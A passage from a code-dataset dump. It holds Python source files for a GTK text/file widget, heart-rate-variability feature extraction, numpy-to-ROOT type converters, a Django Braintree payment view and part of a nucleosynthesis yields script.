\"label\", GObject.BindingFlags.SYNC_CREATE)\n self._spinner.bind_property(\"spinning\", self._spinner, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n self._spinner.bind_property(\"visible\", self._spinner_separator, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n self._action_btn.bind_property(\"visible\", self._action_btn_separator, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n\n # Signal connection\n self._action_btn.connect(\"clicked\", self._on_action_clicked)\n self._view_btn.connect(\"clicked\", self._on_view_clicked)\n self._clear_btn.connect(\"clicked\", self._on_clear_clicked)\n self._copy_btn.connect(\"clicked\", self._on_copy_clicked)\n self._paste_btn.connect(\"clicked\", self._on_paste_clicked)\n self._open_btn.connect(\"clicked\", self._on_open_clicked)\n self._save_btn.connect(\"clicked\", self._on_save_clicked)\n self._textview.get_buffer().connect(\"changed\", self._on_text_changed)\n Adw.StyleManager.get_default().connect(\"notify::dark\", self._on_theme_changed)\n\n def _on_dnd_drop(self, drop_target:Gtk.DropTarget, value: Gdk.FileList, x:float, y:float, user_data:GObject.Object=None):\n self._spinner.set_visible(True)\n files: List[Gio.File] = value.get_files()\n if len(files) != 1:\n self.emit(\"error\", _(\"Cannot open more than one file\"))\n return\n self._open_file(files[0])\n self._spinner.set_visible(False)\n\n def _on_view_clicked(self, user_data:GObject.GPointer):\n app = Gio.Application.get_default()\n window = app.get_active_window()\n Gtk.show_uri(window, \"file://\" + self._fileview.get_file_path(), Gdk.CURRENT_TIME)\n\n def _on_action_clicked(self, user_data:GObject.GPointer):\n self.emit(\"action-clicked\")\n\n def _on_clear_clicked(self, user_data:GObject.GPointer):\n self._clear()\n self._open_btn.set_sensitive(True)\n self.emit(\"view-cleared\")\n\n def _on_copy_clicked(self, user_data:GObject.GPointer):\n text_buffer = self._textview.get_buffer()\n text = text_buffer.get_text(text_buffer.get_start_iter(), text_buffer.get_end_iter(), False)\n clipboard = 
Gdk.Display.get_clipboard(Gdk.Display.get_default())\n clipboard.set(text)\n self.set_visible_view(\"text-area\")\n\n def _on_paste_clicked(self, user_data:GObject.GPointer):\n text_buffer = self._textview.get_buffer()\n clipboard = Gdk.Display.get_clipboard(Gdk.Display.get_default())\n text_buffer.paste_clipboard(clipboard, None, True)\n self.set_visible_view(\"text-area\")\n\n def _on_open_clicked(self, user_data:GObject.GPointer):\n\n # Start loading animation and disable open button\n self._open_btn.set_sensitive(False)\n self.set_visible_view(\"loading\") # change view and save previous\n self.loading_lbl = _(\"Opening file...\")\n\n # Create a file chooser\n app = Gio.Application.get_default()\n window = app.get_active_window()\n self._native = Gtk.FileChooserNative(\n transient_for=window,\n title=_(\"Open File\"),\n action=Gtk.FileChooserAction.OPEN,\n accept_label=_(\"Open\"),\n cancel_label=_(\"Cancel\")\n )\n\n # File filters\n if self.use_all_files_extensions:\n all_files_filter = Gtk.FileFilter()\n all_files_filter.add_pattern(\"*\")\n all_files_filter.set_name(_(\"All files\"))\n self._native.add_filter(all_files_filter)\n\n if self.use_default_text_extensions and self.use_default_image_extensions:\n text_image_filter = Gtk.FileFilter()\n text_image_filter.add_mime_type(\"text/*\")\n text_image_filter.add_pixbuf_formats()\n text_image_filter.set_name(_(\"Text files and images\"))\n self._native.add_filter(text_image_filter)\n\n if self.use_default_text_extensions:\n text_file_filter = Gtk.FileFilter()\n text_file_filter.add_mime_type(\"text/*\")\n text_file_filter.set_name(_(\"Text files\"))\n self._native.add_filter(text_file_filter)\n\n if self.use_default_image_extensions:\n image_file_filter = Gtk.FileFilter()\n image_file_filter.add_pixbuf_formats()\n image_file_filter.set_name(_(\"Images\"))\n self._native.add_filter(image_file_filter)\n\n if self.use_custom_file_extensions:\n custom_file_filter = Gtk.FileFilter()\n for extension in self.custom_file_extensions:\n custom_file_filter.add_suffix(extension.lstrip().rstrip())\n custom_file_filter.set_name(_(\"Accepted files\"))\n self._native.add_filter(custom_file_filter)\n\n # Signals and show dialog\n self._native.connect(\"response\", self._on_open_response)\n self._native.show()\n\n def _on_open_response(self, dialog:Gtk.NativeDialog, response:int):\n if response == Gtk.ResponseType.ACCEPT:\n self._open_file(dialog.get_file())\n else:\n self._open_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view) # Restore previous view\n\n self._native = None\n\n def _open_file(self, file:Gio.File):\n file_path = file.peek_path()\n file_size = file.query_info(\"*\", 0, None).get_size()\n\n if file_size > 536870912: # 512 Mb\n self._fileview.set_file_path(file_path)\n self._fileview.set_file_size(humanize.naturalsize(file_size))\n self._stack.set_visible_child_name(\"file-area\") # Set view without saving the previous\n self.emit(\"big-file\")\n self.emit(\"file-loaded\")\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n else:\n file.load_contents_async(None, self._open_file_async_complete)\n\n def _open_file_async_complete(self, source_file:GObject.Object, result:Gio.AsyncResult, user_data:GObject.GPointer=None):\n contents = source_file.load_contents_finish(result)\n if not contents[0]:\n self._stack.set_visible_child_name(self._previous_view)\n self.emit(\"error\", _(\"Unable to open {file_path}: {file_content}.\").format(file_path=source_file.peek_path(), 
file_content=contents[1]))\n return\n\n if Utils.is_text(contents[1]) and self.allow_drag_and_drop:\n text = contents[1].decode(\"utf-8\")\n text_buffer = self._textview.get_buffer()\n text_buffer.set_text(text)\n text_buffer.place_cursor(text_buffer.get_end_iter())\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n self._stack.set_visible_child_name(\"text-area\") # Set view without saving the previous\n self.emit(\"text-changed\")\n elif Utils.is_image(contents[1]) and self.allow_drag_and_drop:\n image_bytes = GLib.Bytes(contents[1])\n texture = Gdk.Texture.new_from_bytes(image_bytes)\n self._file_bytes = image_bytes\n self._fileview.set_file_path(source_file.peek_path())\n self._imageview.set_paintable(texture)\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(True)\n self._stack.set_visible_child_name(\"image-area\") # Set view without saving the previous\n self.emit(\"image-loaded\")\n elif self.allow_drag_and_drop:\n self._file_bytes = contents[1]\n file_path = source_file.peek_path()\n file_size = source_file.query_info(\"*\", 0, None).get_size()\n self._fileview.set_file_path(file_path)\n self._fileview.set_file_size(humanize.naturalsize(file_size))\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n self._stack.set_visible_child_name(\"file-area\") # Set view without saving the previous\n self.emit(\"file-loaded\")\n\n def _on_save_clicked(self, user_data:GObject.GPointer):\n\n # Start loading animation and disable save button\n self._save_btn.set_sensitive(False)\n self._loading_lbl.set_label(_(\"Saving file...\"))\n self.set_visible_view(\"loading\")\n\n app = Gio.Application.get_default()\n window = app.get_active_window()\n self._native = Gtk.FileChooserNative(\n transient_for=window,\n title=_(\"Save file as\"),\n action=Gtk.FileChooserAction.SAVE,\n accept_label=_(\"Save\"),\n cancel_label=_(\"Cancel\"),\n )\n self._native.connect(\"response\", self._on_save_response)\n self._native.show()\n\n def _on_save_response(self, dialog:Gtk.NativeDialog, response:int):\n if response == Gtk.ResponseType.ACCEPT:\n self._save_file(dialog.get_file())\n else:\n self._save_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view)\n\n self._native = None\n\n def _save_file(self, file:Gio.File):\n\n # If there is nothing to save, return early\n if not self._file_bytes:\n return\n\n file.replace_contents_bytes_async(self._file_bytes, None, False, Gio.FileCreateFlags.NONE, None, self._on_save_file_complete)\n\n def _on_save_file_complete(self, source_file:GObject.Object, result:Gio.AsyncResult, user_data:GObject.GPointer=None):\n res = source_file.replace_contents_finish(result)\n file_path = source_file.peek_path()\n\n self._save_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view)\n if not res:\n self.emit(\"error\", _(\"Unable to save {path}\").format(path=file_path))\n return\n\n self.emit(\"saved\", file_path)\n\n def _on_text_changed(self, data):\n self.emit(\"text-changed\")\n\n def _clear(self):\n self._view_btn.set_visible(False)\n self._textview.get_buffer().set_text(\"\")\n self._textview.remove_css_class(\"border-red\")\n self._fileview.set_file_path(\"\")\n self._fileview.set_file_size(\"\")\n self._stack.set_visible_child_name(\"text-area\")\n\n def _on_theme_changed(self, key:str, user_data:GObject.GPointer):\n if Adw.StyleManager.get_default().get_dark():\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita-dark\")\n else:\n 
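# light mode: fall back to the default (non-dark) Adwaita scheme\n            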
style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita\")\n self._textview.get_buffer().set_style_scheme(style_scheme)\n\n def get_text(self) -> str:\n text_buffer = self._textview.get_buffer()\n text = text_buffer.get_text(text_buffer.get_start_iter(), text_buffer.get_end_iter(), False)\n return text\n\n def set_text(self, text:str):\n self._textview.get_buffer().set_text(text, -1)\n\n def get_buffer(self) -> GtkSource.Buffer:\n return self._textview.get_buffer()\n\n def set_image(self, image_bytes:GLib.Bytes):\n self._imageview.set_paintable(Gdk.Texture.new_from_bytes(image_bytes))\n self._file_bytes = image_bytes\n\n def set_opened_file(self, file_bytes:List[bytes], file_path:str):\n self._file_bytes = file_bytes\n self._fileview.set_file_path(file_path)\n\n def set_opened_file_path(self, file_path:str):\n self._fileview.set_file_path(file_path)\n\n def get_opened_file_path(self) -> str:\n return self._fileview.get_file_path()\n\n def get_opened_file_size(self) -> str:\n return self._fileview.get_file_size()\n\n def add_css_class(self, css_class_name:str):\n self._textview.add_css_class(css_class_name)\n self._imageview.add_css_class(css_class_name)\n self._fileview.add_css_class(css_class_name)\n\n def remove_css_class(self, css_class_name:str):\n self._textview.remove_css_class(css_class_name)\n self._imageview.remove_css_class(css_class_name)\n self._fileview.remove_css_class(css_class_name)\n\n def get_visible_view(self) -> str:\n return self._stack.get_visible_child_name()\n\n def set_visible_view(self, view_name:str):\n self._previous_view = self._stack.get_visible_child_name()\n self._stack.set_visible_child_name(view_name)\n\n def set_text_language_highlight(self, language:str):\n self._textview.get_buffer().set_language(GtkSource.LanguageManager.get_default().get_language(language))\n\n def set_loading_visible(self, enabled:bool, label:str):\n if enabled:\n self.loading_lbl = label\n self._stack.set_visible_child_name(\"loading\")\n else:\n self._stack.set_visible_child_name(self._previous_view)\n\n def set_spinner_spin(self, enabled: bool):\n self._spinner.set_visible(enabled)\n\n def clear(self):\n self._clear()\n","repo_name":"aleiepure/devtoolbox","sub_path":"src/widgets/text_file_area.py","file_name":"text_file_area.py","file_ext":"py","file_size_in_byte":19183,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"39"} +{"seq_id":"37683963420","text":"# Features based on https://github.com/PGomes92/pyhrv\n# https://pyhrv.readthedocs.io/en/latest/index.html\n\nimport pandas as pd\nimport biosppy\nimport pyhrv.time_domain as td\nimport pyhrv\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nfeature_list = ['_nni_mean', '_nni_min', '_nni_max', '_hr_mean', '_hr_min', '_hr_max', '_hr_std',\n '_nni_diff_mean', '_nni_diff_min', '_nni_diff_max', '_sdnn',\n '_rmssd', '_sdsd', '_nn50', '_pnn50', '_nn20', '_pnn20'\n]\n\n\ndef bvp_features(signals, col_names, hrv_func):\n _features = pd.DataFrame(columns=col_names, index=signals.index)\n for i in range(len(signals)):\n try:\n rpeaks = biosppy.signals.ecg.ecg(signals.iloc[i].tolist(), show=False)[2]\n result = hrv_func(rpeaks=rpeaks)\n _features.iloc[i] = dict(result)\n except:\n print(\"Exception in:\", i)\n continue\n return _features\n\n\"\"\"\ndef bvp_frequency_features(signals):\n _features = pd.DataFrame(columns=['fft_peak_vlf', 'fft_peak_lf', 'fft_peak_hf',\n 'fft_abs_vlf', 'fft_abs_lf', 'fft_abs_hf',\n 'fft_rel_vlf', 'fft_rel_lf', 'fft_rel_hf',\n 
'fft_log_vlf', 'fft_log_lf', 'fft_log_hf',\n                                      'fft_norm_lf', 'fft_norm_hf', 'fft_ratio'], index=signals.index)\n    for i in range(len(signals)):\n        try:\n            result = pyhrv.frequency_domain.frequency_domain(signal=signals.iloc[i].tolist())\n            _features.iloc[i]['fft_peak_vlf'] = result[\"fft_peak\"][1]\n            plt.close('all')\n        except:\n            print(\"exception in:\", i)\n            continue\n    print(_features)\n    return _features\n\"\"\"\n\n\ndef extract_features(features, df_data_x, ch_id=\"\"):\n    df_features = pd.DataFrame()\n\n    if len(features) == 0 or len(set(features) & {'nni_mean', 'nni_min', 'nni_max'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['nni_mean', 'nni_min', 'nni_max'], td.nni_parameters)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'nni_diff_mean', 'nni_diff_min', 'nni_diff_max'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['nni_diff_mean', 'nni_diff_min', 'nni_diff_max'], td.nni_differences_parameters)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'hr_mean', 'hr_min', 'hr_max', 'hr_std'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['hr_mean', 'hr_min', 'hr_max', 'hr_std'], td.hr_parameters)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'sdnn'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['sdnn'], td.sdnn)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'rmssd'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['rmssd'], td.rmssd)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'sdsd'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['sdsd'], td.sdsd)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'nn20', 'pnn20'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['nn20', 'pnn20'], td.nn20)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n    if len(features) == 0 or len(set(features) & {'nn50', 'pnn50'}) > 0:\n        df_tmp = bvp_features(df_data_x, ['nn50', 'pnn50'], td.nn50)\n        df_features = pd.concat([df_features, df_tmp], axis=1)\n\n    tmp_cols = df_features.columns\n    df_features.columns = [ch_id + \"_\" + name for name in tmp_cols]\n\n    print('--- BVP features ---')\n    print(df_features.shape)\n    return df_features\n","repo_name":"franslom/feature_contribution","sub_path":"server/features/BVP_feature_extract.py","file_name":"BVP_feature_extract.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73486361395","text":"#!/usr/bin/env python\n\n\"\"\"Define converters to convert between Python (numpy) and C++ (std::vector, Eigen, etc) types\nImplements individual converters along with generic 'convert' function.\"\"\"\n\nfrom load import ROOT as R\nimport numpy as N\nfrom collections import defaultdict\nfrom inspect import getmro\nfrom gna import context\n\n# List all converters in dict: converters['from']['to']\nconverters = defaultdict( dict )\n\n# Add nicknames for types\nnicknames = {\n    R.vector: 'stdvector',\n    R.Points: 'points',\n    R.TMatrixD: 'tmatrixd',\n    R.TMatrixF: 'tmatrixf',\n    # R.Eigen.MatrixXd: 'eigenmatrix',\n    # R.Eigen.VectorXd: 'eigenvector',\n    # R.Eigen.ArrayXd: 'eigenarray',\n    # R.Eigen.ArrayXXd: 'eigenarray2d',\n    N.ndarray: 'array',\n    N.matrixlib.defmatrix.matrix: 'matrix',\n    }\n\ndef convert(obj, totype, debug=False, **kwargs):\n    \"\"\"Convert object obj to type totype.\n    
The converter is chosen from gna.converters dictionary based on the type(obj) or one of its base classes.\n\n    :obj: object to convert\n    :totype: the target type\n\n    Order:\n    1. Set type to type(obj).\n    2. Try to find converter for the current type. Return if found.\n    3. Try to find 'base' converter for the current type. Convert obj to base and return convert(newobj) if 'base' converter found.\n    4. Set type to next base type of obj. Repeat from 2.\n\n    Example:\n        convert( N.array([1, 2, 3]), R.vector('double') )\n        convert( N.array([1, 2, 3]), R.vector, dtype='double' )\n    \"\"\"\n\n    def msg( title, converter=None ):\n        res = title\n        if converter:\n            res+= ' '+converter.__name__\n        typestr = isinstance(totype, str) and totype or totype.__name__\n        res+=\" to convert '{0}' ({1}) to '{2}'\".format(\n                type(obj).__name__,\n                ', '.join([base.__name__ for base in bases]),\n                typestr\n                )\n        if kwargs:\n            res+=' [kwargs: %s]'%( str( kwargs ) )\n\n        return res\n\n    bases = getmro(type(obj))\n    for base in bases:\n        bconverters = converters.get( base )\n        if not bconverters:\n            continue\n        converter = bconverters.get( totype )\n        if converter:\n            break\n\n        if 'base' in bconverters:\n            if debug:\n                print( 'Convert', type(obj).__name__, 'to base' )\n            return convert( bconverters['base'](obj), totype, debug, **kwargs )\n        else:\n            raise Exception(msg('Can not find converter'))\n\n    if debug:\n        print( msg( 'Using converter', converter ) )\n    return converter( obj, **kwargs )\n\ndef save_converter( from_type, to_type ):\n    \"\"\"Make a decorator to store converter in a converters dictionary based on from/to types\"\"\"\n    def decorator( converter ):\n        fts, tts = [from_type], [to_type]\n        if from_type in nicknames:\n            fts.append( nicknames[from_type] )\n        if to_type in nicknames:\n            tts.append( nicknames[to_type] )\n        for ft in fts:\n            for tt in tts:\n                converters[ft][tt] = converter\n        return converter\n    return decorator\n\ndef get_cpp_type( array ):\n    \"\"\"Guess appropriate C++ type to store data based on array.dtype or type\"\"\"\n    if len(array)==0:\n        raise Exception('Unable to determine type of the elements of the empty array')\n    if hasattr( array, 'dtype' ):\n        typemap = {\n            'int32': 'int',\n            'float64': 'double',\n            'float32': 'float',\n            # 'uint64': 'size_t',\n            }\n        atype = array.dtype.name\n    else:\n        typemap = {\n            int: 'int',\n            float: context.current_precision(),\n            str: 'std::string',\n            'int': 'int',\n            'float': context.current_precision(),\n            'str': 'std::string',\n            'variable': 'variable',\n            }\n        atype = type( array[0] ).__name__\n    ret = typemap.get( atype )\n    if not ret:\n        raise Exception( 'Do not know how to convert type '+str(atype) )\n    return ret\n\n@save_converter( list, R.vector )\ndef list_to_stdvector( lst, dtype='auto' ):\n    \"\"\"Convert a list to the std::vector\"\"\"\n    if dtype=='auto':\n        dtype = get_cpp_type( lst )\n    ret = R.vector(dtype)()\n    ret.reserve(len(lst))\n    for v in lst:\n        ret.push_back(v)\n    return ret\n\n@save_converter( N.ndarray, R.vector )\ndef array_to_stdvector( array, dtype='auto' ):\n    \"\"\"Convert an array to the std::vector\"\"\"\n    if dtype=='auto':\n        dtype = get_cpp_type( array )\n    ret = R.vector(dtype)( len( array ) )\n    for i, v in enumerate( array ):\n        ret[i] = v\n    return ret\n\n@save_converter( N.ndarray, R.vector('double') )\ndef array_to_stdvector_double( array ):\n    \"\"\"Convert an array to the std::vector\"\"\"\n    return array_to_stdvector( array, 'double' )\n\n@save_converter( N.ndarray, R.vector('size_t') )\ndef array_to_stdvector_size_t( array ):\n    \"\"\"Convert an array to 
the std::vector\"\"\"\n    return array_to_stdvector( array, 'size_t' )\n\n@save_converter( N.ndarray, R.vector('int') )\ndef array_to_stdvector_int( array ):\n    \"\"\"Convert an array to the std::vector\"\"\"\n    return array_to_stdvector( array, 'int' )\n\ndef stdvector_to_array( vector, dtype=None ):\n    \"\"\"Convert an std::vector to numpy.array\"\"\"\n    return N.array( vector, dtype=dtype )\n\n@save_converter( R.vector('int'), N.ndarray )\ndef stdvector_to_array_int( vector ):\n    \"\"\"Convert std::vector to array of int\"\"\"\n    return stdvector_to_array( vector, 'i' )\n\n@save_converter( R.vector('double'), N.ndarray )\ndef stdvector_to_array_double( vector ):\n    \"\"\"Convert std::vector to array of double\"\"\"\n    return stdvector_to_array( vector, 'd' )\n\n@save_converter( R.vector('float'), N.ndarray )\ndef stdvector_to_array_float( vector ):\n    \"\"\"Convert std::vector to array of float\"\"\"\n    return stdvector_to_array( vector, 'f' )\n\n@save_converter( R.vector('size_t'), N.ndarray )\ndef stdvector_to_array_size_t( vector ):\n    \"\"\"Convert std::vector to array of size_t\"\"\"\n    return stdvector_to_array( vector, 'u8' )\n\n@save_converter( N.matrixlib.defmatrix.matrix, 'base' )\ndef matrix_to_array( matrix ):\n    \"\"\"Convert numpy matrix to array\"\"\"\n    return matrix.A\n\n@save_converter( N.ndarray, R.Points )\ndef array_to_Points( array ):\n    \"\"\"Convert numpy array to Points\"\"\"\n    if len(array.shape)>2:\n        raise Exception( 'Can convert only 1- and 2- dimensional arrays' )\n    if array.dtype != 'float64':\n        array = array.astype('float64')\n    a = array.ravel( order='F' )\n    s = array_to_stdvector_size_t( array.shape )\n    return R.Points( a, s )\n\n# @save_converter( N.ndarray, R.Eigen.MatrixXd )\n# def array_to_eigenmatrix( array ):\n    # \"\"\"Convert numpy array to Eigen::MatrixXd\"\"\"\n    # if len(array.shape)!=2:\n        # raise Exception( 'Can not convert arrays with shape %s tor MatrixXd'%( str(array.shape) ) )\n    # return R.Eigen.MatrixXd(R.Eigen.Map('Eigen::MatrixXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.ArrayXXd )\n# def array_to_eigenarray2d( array ):\n    # \"\"\"Convert numpy array to Eigen::ArrayXXd\"\"\"\n    # if len(array.shape)!=2:\n        # raise Exception( 'Can not convert arrays with shape %s tor ArrayXXd'%( str(array.shape) ) )\n    # return R.Eigen.ArrayXXd(R.Eigen.Map('Eigen::ArrayXXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.VectorXd )\n# def array_to_eigenvector( array ):\n    # \"\"\"Convert numpy array to Eigen::MatrixXd\"\"\"\n    # if len(array.shape)!=2 or array.shape[1]!=1:\n        # raise Exception( 'Can not convert arrays with shape %s tor VectorXd'%( str(array.shape) ) )\n    # return R.Eigen.MatrixXd(R.Eigen.Map('Eigen::MatrixXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.ArrayXd )\n# def array_to_eigenarray( array ):\n    # \"\"\"Convert numpy array to Eigen::ArrayXd\"\"\"\n    # if len(array.shape)!=1:\n        # raise Exception( 'Can not convert arrays with shape %s tor ArrayXd'%( str(array.shape) ) )\n    # return R.Eigen.ArrayXd(R.Eigen.Map('Eigen::ArrayXd')( array.ravel( order='F' ), array.shape[0] ))\n\n# #\n# # Eigen\n# #\n# @save_converter( R.Eigen.MatrixXd, N.ndarray )\n# @save_converter( R.Eigen.VectorXd, N.ndarray )\n# @save_converter( R.Eigen.ArrayXXd, N.ndarray )\n# def eigen_to_array( array ):\n    # \"\"\"Convert Eigen::MatrixXd/Eigen::VectorXd/Eigen::ArrayXXd to numpy array\"\"\"\n    # return N.frombuffer( array.data(), dtype='d', count=array.size() ).reshape( 
array.rows(), array.cols(), order='F' )\n\n# @save_converter( R.Eigen.MatrixXd, N.matrixlib.defmatrix.matrix )\n# @save_converter( R.Eigen.VectorXd, N.matrixlib.defmatrix.matrix )\n# @save_converter( R.Eigen.ArrayXXd, N.matrixlib.defmatrix.matrix )\n# def eigen_to_matrix( array ):\n    # \"\"\"Convert Eigen::MatrixXd/Eigen::VectorXd/Eigen::ArrayXXd to numpy matrix\"\"\"\n    # return N.matrix( eigen_to_array( array ) )\n\n# @save_converter( R.Eigen.ArrayXd, N.ndarray )\n# def eigenarray_to_array( array ):\n    # \"\"\"Convert Eigen::ArrayXd to numpy array\"\"\"\n    # return N.frombuffer( array.data(), dtype='d', count=array.size() )\n\n# @save_converter( R.Eigen.ArrayXd, N.matrixlib.defmatrix.matrix )\n# def eigenarray_to_matrix( array ):\n    # \"\"\"Convert Eigen::ArrayXd to numpy matrix\"\"\"\n    # return N.matrix( eigenarray_to_array( array ) )\n\n#\n# ROOT\n#\n@save_converter( R.TMatrixD, N.ndarray )\n@save_converter( R.TMatrixF, N.ndarray )\ndef tmatrix_to_array( m ):\n    \"\"\"Convert TMatrix* to numpy array\"\"\"\n    cbuf = m.GetMatrixArray()\n    return N.frombuffer( cbuf, N.dtype( cbuf.typecode ), m.GetNoElements() ).reshape( m.GetNrows(), m.GetNcols() )\n\n@save_converter( N.ndarray, R.TMatrixF )\ndef array_to_tmatrixf( arr, **kwargs ):\n    \"\"\"Convert numpy array to TMatrixF\"\"\"\n    return R.TMatrixF( arr.shape[0], arr.shape[1], N.ascontiguousarray(arr, dtype='f').ravel() )\n\n@save_converter( N.ndarray, R.TMatrixD )\ndef array_to_tmatrixd( arr, **kwargs ):\n    \"\"\"Convert numpy array to TMatrixD\"\"\"\n    return R.TMatrixD( arr.shape[0], arr.shape[1], N.ascontiguousarray(arr, dtype='d').ravel() )\n\n@save_converter( N.ndarray, 'tmatrix' )\ndef array_to_tmatrix( arr, **kwargs ):\n    \"\"\"Convert numpy array to TMatrixD or TMatrixF based on dtype\"\"\"\n    if arr.dtype==N.double:\n        cls = R.TMatrixD\n    elif arr.dtype==N.float32:\n        cls = R.TMatrixF\n    else:\n        raise Exception( 'Do not know how to convert %s to TMatrix'%( str(arr.dtype) ) )\n    return cls( arr.shape[0], arr.shape[1], arr.ravel() )\n","repo_name":"gnafit/gna","sub_path":"pylib/gna/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"25478241749","text":"from django.shortcuts import render, redirect, get_object_or_404\nimport braintree\nfrom events.models import OrderTickets, EventTickets\nfrom django.contrib.auth.decorators import login_required\nfrom events.tasks import send_tickets\n\n@login_required\ndef payment_process(request):\n    order_id = request.session.get('order_id')\n    order = get_object_or_404(OrderTickets, id = order_id)\n    \n    if request.method == 'POST':\n        # Get token\n        nonce = request.POST.get('payment_method_nonce', None)\n        \n        # Creating and sending transaction\n        result = braintree.Transaction.sale({\n            'amount': '{:.2f}'.format(order.total_price),\n            'payment_method_nonce': nonce,\n            'options': {\n                'submit_for_settlement': True\n            }\n        })\n        # Successful payment\n        if result.is_success:\n            order.paid = True\n            order.included = True\n            order.braintree_id = result.transaction.id\n            order.save()\n            send_tickets(order.id)\n            return redirect('payment:done')\n        \n        # Payment not successful\n        else:\n            # Adding unpurchased tickets\n            if not order.included:\n                for ticket in order.order.all():\n                    event_ticket = get_object_or_404(EventTickets, id=ticket.event_ticket.id)\n                    event_ticket.number += ticket.quantity\n                    event_ticket.save()\n                order.included = True\n                order.save()\n            return redirect('payment:canceled')\n    else:\n        client_token = 
braintree.ClientToken.generate()\n return render(request,\n 'payment/process.html',\n {'order': order,\n 'client_token': client_token})\n\n\n@login_required\ndef payment_done(request):\n return render(request, 'payment/done.html')\n\n@login_required\ndef payment_canceled(request):\n return render(request, 'payment/canceled.html')","repo_name":"damian0s10/Online-Ticketing-System","sub_path":"payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35244647306","text":"from __future__ import division\nfrom sys import path\npath.append('modules/')\n\nfrom _curses import raw\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nimport scivis.units as ut # for tmerg\nimport statsmodels.formula.api as smf\nfrom math import pi, log10, sqrt\nimport scipy.optimize as opt\nimport matplotlib as mpl\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport os.path\nimport cPickle\nimport time\nimport copy\nimport h5py\nimport csv\nimport os\n\nfrom scidata.utils import locate\nimport scidata.carpet.hdf5 as h5\nimport scidata.xgraph as xg\n\nfrom matplotlib.ticker import AutoMinorLocator, FixedLocator, NullFormatter, \\\n MultipleLocator\nfrom matplotlib.colors import LogNorm, Normalize\nfrom matplotlib.colors import Normalize, LogNorm\n\nfrom general import *\nfrom lists import *\nfrom filework import *\nfrom units import time_constant, volume_constant, energy_constant\n\n\nclass SIM_NUCLEO:\n\n def __init__(self, sim, extension='_0'):\n\n self.sim = sim\n\n self.outflowdir = MakePath.outflow(sim, extension)\n self.path = self.outflowdir + 'yields.h5'\n\n # @staticmethod\n # def normalize_yields(As, Ys):\n # Anrm = np.arange(As.max() + 1)\n # Ynrm = np.zeros(int(As.max()) + 1)\n # for i in range(Ynrm.shape[0]): # changed xrange to range\n # Ynrm[i] = Ys[As == i].sum()\n # return Anrm, Ynrm\n\n def load_res(self):\n\n h5tbl = h5py.File(self.path, \"r\")\n ye_final = np.array(h5tbl[\"Y_final\"])\n a_arr = np.array(h5tbl[\"A\"])\n z_arr = np.array(h5tbl[\"Z\"])\n h5tbl.close()\n\n return a_arr, ye_final, z_arr\n\n # def from_res(self, normalize=True):\n #\n # ye_final, a_arr, z_arr = self.load_res()\n #\n # if normalize == True:\n # a_arr, ye_final = self.normalize_yields(a_arr, ye_final)\n # norm = ye_final.sum()\n # ye_final /= norm\n # return ye_final, a_arr, z_arr\n\n # def from_res_norm_to_sol(self, element_a, a_sol, ye_sol):\n #\n # if len(a_sol) == 0: raise ValueError('No solar arrays prvided')\n #\n # ye_final, a_arr, z_arr = self.load_res()\n # a_arr, ye_final = self.normalize_yields(a_arr, ye_final)\n #\n # if element_a not in a_sol: raise ValueError('Element: a:{} not in solar A'.format(element_a, a_sol))\n # if element_a not in a_arr: raise ValueError('Element: a:{} not in a_arr'.format(element_a, a_arr))\n #\n # delta = np.float(ye_sol[np.where(a_sol == element_a)] / ye_final[np.where(a_arr == element_a)])\n #\n #\n # print(a_sol[np.where(a_sol == element_a)])\n # print(a_arr[np.where(a_sol == element_a)])\n # print('delta:{}'.format(delta))\n # ye_final *= delta\n # # # print(a_sol)\n # # # print(ye_final)\n # # exit(1)\n #\n # return ye_final, a_arr\n\n @staticmethod\n def sum_for_all_charge_z(As, Ys):\n '''Sums all Ys for a given A (for all Z)'''\n Anrm = np.arange(As.max() + 1)\n Ynrm = 
